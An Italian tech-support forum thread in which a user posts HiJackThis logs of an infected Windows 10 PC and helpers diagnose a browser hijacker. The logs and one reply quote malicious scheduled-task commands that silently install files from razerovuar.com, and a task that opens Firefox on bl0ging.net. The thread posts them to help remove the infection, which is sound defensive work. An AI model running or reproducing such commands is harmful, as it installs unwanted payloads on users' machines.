Benvenuto Ospite Cerca | Topic Attivi | Utenti | | Log In | Registra

Aiutamici Forum » FORUM - Istruzioni e Guide » Sicurezza VIRUS » controllo log HIJACK

controllo log HIJACK Opzioni
Topic Precedente · Topic Sucessivo
Viky68
Inviato: Thursday, September 20, 2018 10:31:20 AM

Rank: AiutAmico

Iscritto dal : 1/30/2003
Posts: 272
Ciao per piacere non riesco piu' ad usare il pc si aprono in continazione pagine internet senza nessun comando da parte mia e il pc non risponde piu' ai comandi e di conseguenza e' anche molto lento anzi quasi bloccato
GRAZIE
Logfile of HiJackThis Fork (Beta) by Alex Dragokas v.2.8.0.4

Platform: x64 Windows 10 (Pro), 10.0.17134.285 (ReleaseId: 1803), Service Pack: 0
Time: 20.09.2018 - 10:23 (UTC+02:00)
Language: OS: Italian (0x410). Display: Italian (0x410). Non-Unicode: Italian (0x410)
Elevated: Yes
Ran by: saras (group: Administrator) on DESKTOP-FNSU2JF, FirstRun: yes

Firefox: 62.0.0.6816
Edge: 11.0.17134.285
Internet Explorer: 11.0.17134.1
Default: "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "%1" (Firefox)

Boot mode: Normal

Running processes:
Number | Path
1 C:\Program Files (x86)\Creative\Sound Blaster X-Fi\Volume Panel\VolPanlu.exe
1 C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallMonitor.exe
1 C:\Program Files (x86)\IObit\Smart Defrag\SmartDefrag.exe
1 C:\Program Files\CCleaner\CCleaner64.exe
1 C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
2 C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
1 C:\Program Files\Windows Defender\MSASCuiL.exe
1 C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.1807.18075-0\MsMpEng.exe
1 C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.1807.18075-0\NisSrv.exe
1 C:\Users\saras\Desktop\PortableApps\HijackThisPortable\App\HijackThis\HijackThis.exe
1 C:\Users\saras\Desktop\PortableApps\HijackThisPortable\App\HijackThis\MemCompression
1 C:\Users\saras\Desktop\PortableApps\HijackThisPortable\App\HijackThis\Registry
1 C:\Users\saras\Desktop\PortableApps\HijackThisPortable\HijackThisPortable.exe
1 C:\Windows\SysWOW64\CTxfispi.exe
4 C:\Windows\SysWOW64\svchost.exe
2 C:\Windows\System32\RuntimeBroker.exe
1 C:\Windows\System32\SearchFilterHost.exe
1 C:\Windows\System32\SearchIndexer.exe
1 C:\Windows\System32\SearchProtocolHost.exe
1 C:\Windows\System32\SecurityHealthService.exe
1 C:\Windows\System32\SettingSyncHost.exe
1 C:\Windows\System32\SgrmBroker.exe
2 C:\Windows\System32\WUDFHost.exe
1 C:\Windows\System32\audiodg.exe
1 C:\Windows\System32\conhost.exe
2 C:\Windows\System32\csrss.exe
1 C:\Windows\System32\ctfmon.exe
1 C:\Windows\System32\dasHost.exe
1 C:\Windows\System32\dllhost.exe
1 C:\Windows\System32\dwm.exe
2 C:\Windows\System32\fontdrvhost.exe
1 C:\Windows\System32\lsass.exe
1 C:\Windows\System32\services.exe
1 C:\Windows\System32\sihost.exe
1 C:\Windows\System32\smartscreen.exe
1 C:\Windows\System32\smss.exe
1 C:\Windows\System32\spoolsv.exe
75 C:\Windows\System32\svchost.exe
1 C:\Windows\System32\taskhostw.exe
1 C:\Windows\System32\wbem\WmiPrvSE.exe
1 C:\Windows\System32\wbem\unsecapp.exe
1 C:\Windows\System32\wininit.exe
1 C:\Windows\System32\winlogon.exe
1 C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
1 C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
1 C:\Windows\explorer.exe

O2 - HKLM\..\BHO: ExplorerWnd Helper - {10921475-03CE-4E04-90CE-E2E7EF20C814} - C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallExplorer.dll
O2-32 - HKLM\..\BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_181\bin\jp2ssv.dll
O2-32 - HKLM\..\BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_181\bin\ssv.dll
O4 - HKCU\..\Run: [CCleaner Monitoring] = C:\Program Files\CCleaner\CCleaner64.exe /MONITOR
O4 - HKLM\..\Session Manager: [BootExecute] = C:\WINDOWS\system32\SmartDefragBootTime.exe
O4 - HKLM\..\StartupApproved\Run32: [CTxfiHlp] (2018/06/21) = CTXFIHLP.EXE (file missing)
O4 - HKLM\..\StartupApproved\Run32: [UpdReg] (2017/08/05) = C:\WINDOWS\UpdReg.EXE
O4 - HKLM\..\StartupApproved\Run: [SecurityHealth] (1601/01/01) = C:\Program Files\Windows Defender\MSASCuiL.exe
O4 - HKLM\..\StartupApproved\Run: [iTunesHelper] (2017/06/30) = C:\Program Files\iTunes\iTunesHelper.exe
O4 - HKLM\..\StartupApproved\StartupFolder: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Digital Imaging Monitor.lnk -> C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe (2017/06/30)
O4 - HKU\S-1-5-19\..\RunOnce: [WAB Migrate] = C:\Program Files\Windows Mail\wab.exe /Upgrade
O4 - HKU\S-1-5-20\..\RunOnce: [WAB Migrate] = C:\Program Files\Windows Mail\wab.exe /Upgrade
O4-32 - HKLM\..\Run: [VolPanel] = C:\Program Files (x86)\Creative\Sound Blaster X-Fi\Volume Panel\VolPanlu.exe /r
O15 - Trusted Zone: HKCU - *.localhost
O17 - DHCP DNS 1: 77.242.176.10
O17 - DHCP DNS 2: 77.242.176.11
O22 - Task (Job): (disabled) (Not scheduled) WebReg HP Photosmart B110 series.job - C:\Program Files (x86)\HP\Digital Imaging\bin\hpqwrg.exe "HP Photosmart B110 series"
O22 - Task: (disabled) \Microsoft\Windows\HelloFace\FODCleanupTask - C:\WINDOWS\System32\WinBioPlugIns\FaceFodUninstaller.exe (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\InstallService\WakeUpAndContinueUpdates - {0DC331EE-8438-49D5-A721-E10B937CE459} - C:\Windows\System32\InstallServiceTasks.dll (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\InstallService\WakeUpAndScanForUpdates - {D5A04D91-6FE6-4FE4-A98A-FEB4500C5AF7} - C:\Windows\System32\InstallServiceTasks.dll (Microsoft)
O22 - Task: (disabled) \S-1-5-21-2783680875-3079218225-2031400135-1001\DataSenseLiveTileTask - C:\WINDOWS\System32\DataUsageLiveTileTask.exe
O22 - Task: Adobe Flash Player NPAPI Notifier - C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_31_0_0_108_Plugin.exe -check plugin
O22 - Task: Adobe Flash Player Updater - C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O22 - Task: BlueStacksHelper - C:\ProgramData\Client\Helper\BlueStacksHelper.exe
O22 - Task: CCleaner Update - C:\Program Files\CCleaner\CCUpdate.exe
O22 - Task: CCleanerSkipUAC - C:\Program Files\CCleaner\CCleaner.exe $(Arg0)
O22 - Task: Driver Booster SkipUAC (saras) - C:\Program Files (x86)\IObit\Driver Booster\5.5.0\DriverBooster.exe /skipuac
O22 - Task: NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} - C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe
O22 - Task: NvBatteryBoostCheckOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} - C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe -d "C:\Program Files\NVIDIA Corporation\NvBackend\NvBatteryBoostCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerBatteryBoostCheck.log
O22 - Task: NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} - C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe -d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log
O22 - Task: NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} - C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe --launcher=TaskScheduler
O22 - Task: NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} - C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe
O22 - Task: NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} - C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe
O22 - Task: NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} - C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe
O22 - Task: NvTmRepCR1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} - C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe /noshim
O22 - Task: NvTmRepCR2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} - C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe /noshim
O22 - Task: NvTmRepCR3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} - C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe /noshim
O22 - Task: NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} - C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe
O22 - Task: SmartDefrag_AutoAnalyze - C:\Program Files (x86)\IObit\Smart Defrag\AutoDefrag.exe /AUTOANALYZE
O22 - Task: SmartDefrag_Startup - C:\Program Files (x86)\IObit\Smart Defrag\SmartDefrag.exe /STARTUP
O22 - Task: SmartDefrag_Update - C:\Program Files (x86)\IObit\Smart Defrag\AutoUpdate.exe /autorun
O22 - Task: Uninstaller_SkipUac_saras - C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe /UninstallExplorer
O22 - Task: \Apple\AppleSoftwareUpdate - C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe -task
O22 - Task: \Microsoft\Windows\DeviceDirectoryClient\RegisterDeviceLocationRightsChange - {AE31B729-D5FD-401E-AF42-784074835AFE},-RegisterDevice -SettingChange - C:\WINDOWS\system32\DeviceDirectoryClient.dll (Microsoft)
O22 - Task: \Microsoft\Windows\DeviceDirectoryClient\RegisterDevicePolicyChange - {AE31B729-D5FD-401E-AF42-784074835AFE},-RegisterDevice -SettingChange - C:\WINDOWS\system32\DeviceDirectoryClient.dll (Microsoft)
O22 - Task: \Microsoft\Windows\DeviceDirectoryClient\RegisterDeviceProtectionStateChanged - {AE31B729-D5FD-401E-AF42-784074835AFE},-RegisterDevice -ProtectionStateChanged -FreeNetworkOnly - C:\WINDOWS\system32\DeviceDirectoryClient.dll (Microsoft)
O22 - Task: \Microsoft\Windows\DeviceDirectoryClient\RegisterDeviceWnsFallback - {AE31B729-D5FD-401E-AF42-784074835AFE},-RegisterDevice -Periodic - C:\WINDOWS\system32\DeviceDirectoryClient.dll (Microsoft)
O22 - Task: \Microsoft\Windows\DirectX\DXGIAdapterCache - C:\WINDOWS\system32\dxgiadaptercache.exe (Microsoft)
O22 - Task: \Microsoft\Windows\InstallService\ScanForUpdates - {A558C6A5-B42B-4C98-B610-BF9559143139} - C:\Windows\System32\InstallServiceTasks.dll (Microsoft)
O22 - Task: \Microsoft\Windows\InstallService\ScanForUpdatesAsUser - {DDAFAEA2-8842-4E96-BADE-D44A8D676FDB} - C:\Windows\System32\InstallServiceTasks.dll (Microsoft)
O22 - Task: \Microsoft\Windows\InstallService\SmartRetry - {F3A219C3-2698-4CBF-9C07-037EDB8E72E6} - C:\Windows\System32\InstallServiceTasks.dll (Microsoft)
O22 - Task: \Microsoft\Windows\LanguageComponentsInstaller\ReconcileLanguageResources - {D0582E3B-3126-4CAA-9155-AC37C912A489} - C:\WINDOWS\System32\LanguageOverlayServer.dll (Microsoft)
O22 - Task: \Microsoft\Windows\Speech\HeadsetButtonPress - C:\WINDOWS\system32\speech_onecore\common\SpeechRuntime.exe StartedFromTask (Microsoft)
O22 - Task: \Microsoft\Windows\WaaSMedic\PerformRemediation - {72566E27-1ABB-4EB3-B4F0-EB431CB1CB32},None - C:\WINDOWS\System32\WaaSMedicSvc.dll (Microsoft)
O22 - Task: \Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance - C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1807.18075-0\MpCmdRun.exe -IdleTask -TaskName WdCacheMaintenance
O22 - Task: \Microsoft\Windows\Windows Defender\Windows Defender Cleanup - C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1807.18075-0\MpCmdRun.exe -IdleTask -TaskName WdCleanup
O22 - Task: \Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan - C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1807.18075-0\MpCmdRun.exe Scan -ScheduleJob -ScanTrigger 55
O22 - Task: \Microsoft\Windows\Windows Defender\Windows Defender Verification - C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1807.18075-0\MpCmdRun.exe -IdleTask -TaskName WdVerification
O22 - Task: {6C6DDEFF-6E7F-5338-C25F-129A03293CE8} - C:\Program Files\Mozilla Firefox\firefox.exe http://bl0ging.net/cl/?guid=5c5dcxldjds502caat9e68kbgbrtujoq&prid=1&pid=5_1301_13022
O22 - Task: {C5AAA592-0D58-4DB3-9351-3F3D577131EA} - C:\Program Files (x86)\Common Files\PiaOionoeAujq.exe /q /i http://razerovuar.com/zhqb5ohaemej.ymx
O22 - Task: {CBEF6C52-1AA7-8D65-8643-7FD85CA451F9} - C:\Users\saras\AppData\Local\GHUOiOAWZIumE.exe /q /i http://razerovuar.com/qdhqzedavfwp.qya
O23 - Service R2: Apple Mobile Device Service - C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
O23 - Service R2: HP Network Devices Support - (HPSLPSVC) - C:\WINDOWS\system32\svchost.exe -k HPService; "ServiceDll" = C:\Program Files (x86)\HP\Digital Imaging\bin\HPSLPSVC64.DLL
O23 - Service R2: NVIDIA Display Container LS - (NVDisplay.ContainerLocalSystem) - C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000
O23 - Service R2: Net Driver HPZ12 - C:\WINDOWS\System32\svchost.exe -k HPZ12; "ServiceDll" = C:\Windows\System32\HPZinw12.dll
O23 - Service R2: Pml Driver HPZ12 - C:\WINDOWS\System32\svchost.exe -k HPZ12; "ServiceDll" = C:\Windows\System32\HPZipm12.dll
O23 - Service R2: Servizio Windows Defender Antivirus - (WinDefend) - C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1807.18075-0\MsMpEng.exe
O23 - Service R2: Servizio di rilevamento dispositivi HP CUE - (hpqddsvc) - C:\WINDOWS\SysWow64\svchost.exe -k hpdevmgmt; "ServiceDll" = C:\Program Files (x86)\HP\Digital Imaging\bin\hpqddsvc.dll
O23 - Service R3: Servizio Controllo rete di Windows Defender Antivirus - (WdNisSvc) - C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1807.18075-0\NisSrv.exe
O23 - Service R3: hpqcxs08 - C:\WINDOWS\SysWow64\svchost.exe -k hpdevmgmt; "ServiceDll" = C:\Program Files (x86)\HP\Digital Imaging\bin\hpqcxs08.dll
O23 - Service S2: IObit Uninstaller Service - (IObitUnSvr) - C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
O23 - Service S2: Origin Web Helper Service - C:\Program Files (x86)\Origin\OriginWebHelperService.exe
O23 - Service S3: Servizio Windows Defender Advanced Threat Protection - (Sense) - C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe
O23 - Service S3: Servizio iPod - (iPod Service) - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service S3: Steam Client Service - C:\Program Files (x86)\Common Files\Steam\SteamService.exe /RunAsService


--
End of file - Time spent: 29 sec. - 28154 bytes, CRC32: FFFFFFFF. Sign: 졻
Torna in alto
 
Sponsor
Inviato: Thursday, September 20, 2018 10:31:20 AM

 
Torna in alto
 
giza
Inviato: Thursday, September 20, 2018 10:41:11 AM

Rank: AiutAmico

Iscritto dal : 10/27/2006
Posts: 9,614
fai tutto questo

http://forum.aiutamici.com/yaf_postst96025_ELIMINARE-PAGINE-PUBBLICITARIE-E-PORCHERIE-VARIE-E-PULIRE-SISTEMA.aspx
Torna in alto
 
cbbusto
Inviato: Thursday, September 20, 2018 3:46:25 PM

Rank: AiutAmico

Iscritto dal : 11/8/2008
Posts: 13,964
Hai un dirottatore, razerovuar si trova nei programmi, non credo lo hai installato tu, segui il percorso e rimuovilo:
C:\Program Files (x86)\Common Files\PiaOionoeAujq.exe /q /i http://razerovuar.com/zhqb5ohaemej.ymx
C:\Users\saras\AppData\Local\GHUOiOAWZIumE.exe /q /i http://razerovuar.com/qdhqzedavfwp.qya

Poi elimina Smart Defrag, win 10 deframmenta automaticamente il disco, non occorrono altri sw
Da Ccleaner togli il monitoraggio non serve e rallenta il pc.
Poi disattiva tutte le voci in avvio automatico, lascia solo Defender.
Dopo aver fatto le pulizie che ti sono state indicate da giza, rifai una scansione con HJT e posta il nuovo log.
Ciao
Torna in alto
 
Viky68
Inviato: Friday, September 21, 2018 9:20:16 PM

Rank: AiutAmico

Iscritto dal : 1/30/2003
Posts: 272
Grazie:
Logfile of HiJackThis Fork (Beta) by Alex Dragokas v.2.8.0.4

Platform: x64 Windows 10 (Pro), 10.0.17134.285 (ReleaseId: 1803), Service Pack: 0
Time: 21.09.2018 - 21:18 (UTC+02:00)
Language: OS: Italian (0x410). Display: Italian (0x410). Non-Unicode: Italian (0x410)
Elevated: Yes
Ran by: saras (group: Administrator) on DESKTOP-FNSU2JF, FirstRun: yes

Firefox: 62.0.0.6816
Edge: 11.0.17134.285
Internet Explorer: 11.0.17134.1
Default: "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "%1" (Firefox)

Boot mode: Normal

Running processes:
Number | Path
1 C:\Program Files (x86)\Creative\Sound Blaster X-Fi\Volume Panel\VolPanlu.exe
1 C:\Program Files (x86)\IObit\IObit Malware Fighter\IMF.exe
1 C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFTips.exe
1 C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFsrv.exe
1 C:\Program Files (x86)\IObit\IObit Malware Fighter\pub\PubMonitor.exe
1 C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallMonitor.exe
1 C:\Program Files\CCleaner\CCleaner64.exe
1 C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
2 C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
1 C:\Program Files\Windows Defender\MSASCuiL.exe
1 C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.1807.18075-0\MsMpEng.exe
1 C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.1807.18075-0\NisSrv.exe
1 C:\Users\saras\Desktop\PortableApps\HijackThisPortable\App\HijackThis\HijackThis.exe
1 C:\Users\saras\Desktop\PortableApps\HijackThisPortable\App\HijackThis\MemCompression
1 C:\Users\saras\Desktop\PortableApps\HijackThisPortable\App\HijackThis\Registry
1 C:\Windows\SysWOW64\CTxfispi.exe
2 C:\Windows\SysWOW64\svchost.exe
3 C:\Windows\System32\RuntimeBroker.exe
1 C:\Windows\System32\SearchIndexer.exe
1 C:\Windows\System32\SecurityHealthService.exe
1 C:\Windows\System32\SettingSyncHost.exe
1 C:\Windows\System32\SgrmBroker.exe
2 C:\Windows\System32\WUDFHost.exe
1 C:\Windows\System32\audiodg.exe
2 C:\Windows\System32\csrss.exe
1 C:\Windows\System32\ctfmon.exe
1 C:\Windows\System32\dasHost.exe
1 C:\Windows\System32\dllhost.exe
1 C:\Windows\System32\dwm.exe
2 C:\Windows\System32\fontdrvhost.exe
1 C:\Windows\System32\lsass.exe
1 C:\Windows\System32\services.exe
1 C:\Windows\System32\sihost.exe
1 C:\Windows\System32\smartscreen.exe
1 C:\Windows\System32\smss.exe
1 C:\Windows\System32\spoolsv.exe
70 C:\Windows\System32\svchost.exe
1 C:\Windows\System32\taskhostw.exe
1 C:\Windows\System32\wininit.exe
1 C:\Windows\System32\winlogon.exe
1 C:\Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\LockApp.exe
1 C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
1 C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
1 C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.17134.281_none_eada712a1d8142be\TiWorker.exe
1 C:\Windows\explorer.exe
1 C:\Windows\servicing\TrustedInstaller.exe

O2 - HKLM\..\BHO: ExplorerWnd Helper - {10921475-03CE-4E04-90CE-E2E7EF20C814} - C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallExplorer.dll
O2-32 - HKLM\..\BHO: IObit Ads Removal - {FFCB3198-32F3-4E8B-9539-4324694ED664} - C:\Program Files (x86)\IObit\IObit Malware Fighter\Surfing Protection\Adblock\Adblock.dll
O2-32 - HKLM\..\BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_181\bin\jp2ssv.dll
O2-32 - HKLM\..\BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_181\bin\ssv.dll
O4 - HKCU\..\Run: [CCleaner Monitoring] = C:\Program Files\CCleaner\CCleaner64.exe /MONITOR
O4 - HKLM\..\StartupApproved\Run32: [CTxfiHlp] (2018/06/21) = CTXFIHLP.EXE (file missing)
O4 - HKLM\..\StartupApproved\Run32: [UpdReg] (2017/08/05) = C:\WINDOWS\UpdReg.EXE
O4 - HKLM\..\StartupApproved\Run: [SecurityHealth] (1601/01/01) = C:\Program Files\Windows Defender\MSASCuiL.exe
O4 - HKLM\..\StartupApproved\Run: [iTunesHelper] (2017/06/30) = C:\Program Files\iTunes\iTunesHelper.exe
O4 - HKLM\..\StartupApproved\StartupFolder: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Digital Imaging Monitor.lnk -> C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe (2017/06/30)
O4 - HKU\S-1-5-19\..\RunOnce: [WAB Migrate] = C:\Program Files\Windows Mail\wab.exe /Upgrade
O4 - HKU\S-1-5-20\..\RunOnce: [WAB Migrate] = C:\Program Files\Windows Mail\wab.exe /Upgrade
O4-32 - HKLM\..\Run: [IObit Malware Fighter] = C:\Program Files (x86)\IObit\IObit Malware Fighter\IMF.exe /autostart
O4-32 - HKLM\..\Run: [VolPanel] = C:\Program Files (x86)\Creative\Sound Blaster X-Fi\Volume Panel\VolPanlu.exe /r
O15 - Trusted Zone: HKCU - *.localhost
O17 - DHCP DNS 1: 77.242.176.10
O17 - DHCP DNS 2: 77.242.176.11
O21 - HKLM\..\ShellIconOverlayIdentifiers: BlueBirdShell Class - {0BB81440-5F42-4480-A5F7-770A6F439FC8} - C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFShellExt.dll
O22 - Task (Job): (disabled) (Not scheduled) Uninstaller_SkipUac_saras.job - C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe /UninstallExplorer
O22 - Task (Job): (disabled) (Not scheduled) WebReg HP Photosmart B110 series.job - C:\Program Files (x86)\HP\Digital Imaging\bin\hpqwrg.exe "HP Photosmart B110 series"
O22 - Task: (disabled) \Microsoft\Windows\HelloFace\FODCleanupTask - C:\WINDOWS\System32\WinBioPlugIns\FaceFodUninstaller.exe (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\InstallService\WakeUpAndContinueUpdates - {0DC331EE-8438-49D5-A721-E10B937CE459} - C:\Windows\System32\InstallServiceTasks.dll (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\InstallService\WakeUpAndScanForUpdates - {D5A04D91-6FE6-4FE4-A98A-FEB4500C5AF7} - C:\Windows\System32\InstallServiceTasks.dll (Microsoft)
O22 - Task: (disabled) \S-1-5-21-2783680875-3079218225-2031400135-1001\DataSenseLiveTileTask - C:\WINDOWS\System32\DataUsageLiveTileTask.exe
O22 - Task: Adobe Flash Player NPAPI Notifier - C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_31_0_0_108_Plugin.exe -check plugin
O22 - Task: Adobe Flash Player Updater - C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O22 - Task: BlueStacksHelper - C:\ProgramData\Client\Helper\BlueStacksHelper.exe
O22 - Task: CCleaner Update - C:\Program Files\CCleaner\CCUpdate.exe
O22 - Task: CCleanerSkipUAC - C:\Program Files\CCleaner\CCleaner.exe $(Arg0)
O22 - Task: NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} - C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe
O22 - Task: NvBatteryBoostCheckOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} - C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe -d "C:\Program Files\NVIDIA Corporation\NvBackend\NvBatteryBoostCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerBatteryBoostCheck.log
O22 - Task: NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} - C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe -d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log
O22 - Task: NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} - C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe --launcher=TaskScheduler
O22 - Task: NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} - C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe
O22 - Task: NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} - C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe
O22 - Task: NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} - C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe
O22 - Task: NvTmRepCR1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} - C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe /noshim
O22 - Task: NvTmRepCR2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} - C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe /noshim
O22 - Task: NvTmRepCR3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} - C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe /noshim
O22 - Task: NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} - C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe
O22 - Task: \Apple\AppleSoftwareUpdate - C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe -task
O22 - Task: \Microsoft\Windows\DeviceDirectoryClient\RegisterDeviceLocationRightsChange - {AE31B729-D5FD-401E-AF42-784074835AFE},-RegisterDevice -SettingChange - C:\WINDOWS\system32\DeviceDirectoryClient.dll (Microsoft)
O22 - Task: \Microsoft\Windows\DeviceDirectoryClient\RegisterDevicePolicyChange - {AE31B729-D5FD-401E-AF42-784074835AFE},-RegisterDevice -SettingChange - C:\WINDOWS\system32\DeviceDirectoryClient.dll (Microsoft)
O22 - Task: \Microsoft\Windows\DeviceDirectoryClient\RegisterDeviceProtectionStateChanged - {AE31B729-D5FD-401E-AF42-784074835AFE},-RegisterDevice -ProtectionStateChanged -FreeNetworkOnly - C:\WINDOWS\system32\DeviceDirectoryClient.dll (Microsoft)
O22 - Task: \Microsoft\Windows\DeviceDirectoryClient\RegisterDeviceWnsFallback - {AE31B729-D5FD-401E-AF42-784074835AFE},-RegisterDevice -Periodic - C:\WINDOWS\system32\DeviceDirectoryClient.dll (Microsoft)
O22 - Task: \Microsoft\Windows\DirectX\DXGIAdapterCache - C:\WINDOWS\system32\dxgiadaptercache.exe (Microsoft)
O22 - Task: \Microsoft\Windows\InstallService\ScanForUpdates - {A558C6A5-B42B-4C98-B610-BF9559143139} - C:\Windows\System32\InstallServiceTasks.dll (Microsoft)
O22 - Task: \Microsoft\Windows\InstallService\ScanForUpdatesAsUser - {DDAFAEA2-8842-4E96-BADE-D44A8D676FDB} - C:\Windows\System32\InstallServiceTasks.dll (Microsoft)
O22 - Task: \Microsoft\Windows\InstallService\SmartRetry - {F3A219C3-2698-4CBF-9C07-037EDB8E72E6} - C:\Windows\System32\InstallServiceTasks.dll (Microsoft)
